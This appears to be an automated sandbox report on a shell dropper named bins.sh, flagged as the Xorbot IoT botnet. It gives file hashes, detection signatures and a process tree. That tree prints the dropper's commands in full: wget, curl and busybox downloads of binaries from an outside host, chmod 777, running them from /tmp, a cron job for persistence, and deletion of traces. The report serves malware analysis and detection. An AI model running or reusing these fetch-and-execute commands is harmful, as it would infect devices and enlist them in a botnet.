Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

3

bins.sh

debian-9-armhf

7

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    10/12/2024, 12:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    76332caef0ad924adea8ad2d888817f1

  • SHA1

    a8474f314af7375aabfa4b9c94d039e27c8a4f87

  • SHA256

    5ba18bcbe3809ddafbbc1b1452b28070c84795f6254dcb2f4774942326290c2b

  • SHA512

    32bc8f9f68837d308bb57cca1de47d44b286fcff7835c439992400e7455f5a79afbb3be407a9166a65bc6a1ae1a654dd6fd59c0b2e68c67ceb2e4710a7742952

  • SSDEEP

    192:Hl4Akbp1TV77YpFUx3MI+4p1977YpFS3MIRfK:Hl4Akbp1TV77YpFUx3MI+4p1977YpFSW

Score
10/10
xorbotbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatiotrojan

Malware Config

Signatures

  • Detects Xorbot 3 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (2001) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 16 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 7 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:709
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:711
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:716
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:736
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:740
        • /bin/chmod
          chmod 777 3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • File and Directory Permissions Modification
          PID:741
        • /tmp/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          ./3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:742
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:744
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:745
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:746
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:747
              • /bin/rm
                rm 3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
                2⤵
                  PID:749
                • /usr/bin/wget
                  wget http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
                  2⤵
                  • System Network Configuration Discovery
                  PID:752
                • /usr/bin/curl
                  curl -O http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
                  2⤵
                  • System Network Configuration Discovery
                  PID:838
                • /bin/busybox
                  /bin/busybox wget http://conn.masjesu.zip/bins/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
                  2⤵
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:843
                • /bin/chmod
                  chmod 777 ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
                  2⤵
                  • File and Directory Permissions Modification
                  PID:844
                • /tmp/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
                  ./ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
                  2⤵
                  • Executes dropped EXE
                  PID:845
                • /bin/rm
                  rm ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
                  2⤵
                    PID:851
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
                    2⤵
                    • System Network Configuration Discovery
                    PID:852
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
                    2⤵
                    • System Network Configuration Discovery
                    PID:853
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:854
                  • /bin/chmod
                    chmod 777 lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
                    2⤵
                    • File and Directory Permissions Modification
                    PID:859
                  • /tmp/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
                    ./lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
                    2⤵
                    • Executes dropped EXE
                    PID:860
                  • /bin/rm
                    rm lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
                    2⤵
                      PID:862
                    • /usr/bin/wget
                      wget http://conn.masjesu.zip/bins/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
                      2⤵
                      • System Network Configuration Discovery
                      PID:863
                    • /usr/bin/curl
                      curl -O http://conn.masjesu.zip/bins/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
                      2⤵
                      • System Network Configuration Discovery
                      PID:864
                    • /bin/busybox
                      /bin/busybox wget http://conn.masjesu.zip/bins/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
                      2⤵
                      • System Network Configuration Discovery
                      • Writes file to tmp directory
                      PID:867
                    • /bin/chmod
                      chmod 777 WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
                      2⤵
                      • File and Directory Permissions Modification
                      PID:870
                    • /tmp/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
                      ./WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
                      2⤵
                      • Executes dropped EXE
                      PID:871
                    • /bin/rm
                      rm WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
                      2⤵
                        PID:872
                      • /usr/bin/wget
                        wget http://conn.masjesu.zip/bins/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
                        2⤵
                        • System Network Configuration Discovery
                        PID:873
                      • /usr/bin/curl
                        curl -O http://conn.masjesu.zip/bins/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
                        2⤵
                        • System Network Configuration Discovery
                        PID:879
                      • /bin/busybox
                        /bin/busybox wget http://conn.masjesu.zip/bins/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
                        2⤵
                        • System Network Configuration Discovery
                        • Writes file to tmp directory
                        PID:881
                      • /bin/chmod
                        chmod 777 TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
                        2⤵
                        • File and Directory Permissions Modification
                        PID:888
                      • /tmp/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
                        ./TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
                        2⤵
                        • Executes dropped EXE
                        PID:890
                      • /bin/rm
                        rm TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
                        2⤵
                          PID:895
                        • /usr/bin/wget
                          wget http://conn.masjesu.zip/bins/5dplbCUfIy43JFL8belWdirvGjKEgYaLqU
                          2⤵
                          • System Network Configuration Discovery
                          PID:897

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/3YUGdPXluGcVg98iYNP6nXEDCgjWVsve9v
                        Filesize

                        151KB

                        MD5

                        6c583043d91c55aa470c08c87058e917

                        SHA1

                        abf65a5b9bba69980278ad09356e53de8bb89439

                        SHA256

                        2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                        SHA512

                        82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                        Download Submit

                      • /tmp/TcjtbKWTus7clTOgbmCaw7a6BPyBWnYyUu
                        Filesize

                        177KB

                        MD5

                        786d75a158fe731feca3880f436082c0

                        SHA1

                        79ea2734e43d00cdeabed5586b2c1994d02aef3e

                        SHA256

                        5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                        SHA512

                        7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                        Download Submit

                      • /tmp/WQt8PGIrrt77f9GaFzfCkaMtwyNEtaN8aV
                        Filesize

                        98KB

                        MD5

                        5141342d0df8699fa32a6b066a0c592e

                        SHA1

                        8157673225bd5182f16215e2aa823a25ca2d4fbc

                        SHA256

                        54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                        SHA512

                        d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                        Download Submit

                      • /tmp/lyNaH7vmD6N4e4MiEHpYemu3SMBBUnG4X3
                        Filesize

                        99KB

                        MD5

                        9438d9bc392bcf300a5583b6df5bc8f6

                        SHA1

                        375a6ae34b516f6f3eeea8030c4084f585017efa

                        SHA256

                        68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

                        SHA512

                        1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

                        Download Submit

                      • /tmp/ueGyRhJ4slW8tDDSMvvYb444hjR5Cs3ghf
                        Filesize

                        111KB

                        MD5

                        ca897a38f23ec23521ce0b1b83f8422d

                        SHA1

                        b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

                        SHA256

                        043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

                        SHA512

                        10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

                        Download Submit

                      • /var/spool/cron/crontabs/tmp.zTPbkf
                        Filesize

                        210B

                        MD5

                        41df79823063639c62a77b5f7bffad1f

                        SHA1

                        7275b16056f2b5745230e7aa755371a7dbe84476

                        SHA256

                        3b5639bacdb4eea57461e32231f337f6be886477a3cdd20e3f417b0d1318042d

                        SHA512

                        de8000f07b2d86a85b3733de29cfec5192b5756f1f7c3e2f63696b0dc92aa6c4db12217791171124de1b26c9fa89a8aa44299da93911b6352fe7e7f4562c3e69

                        Download Submit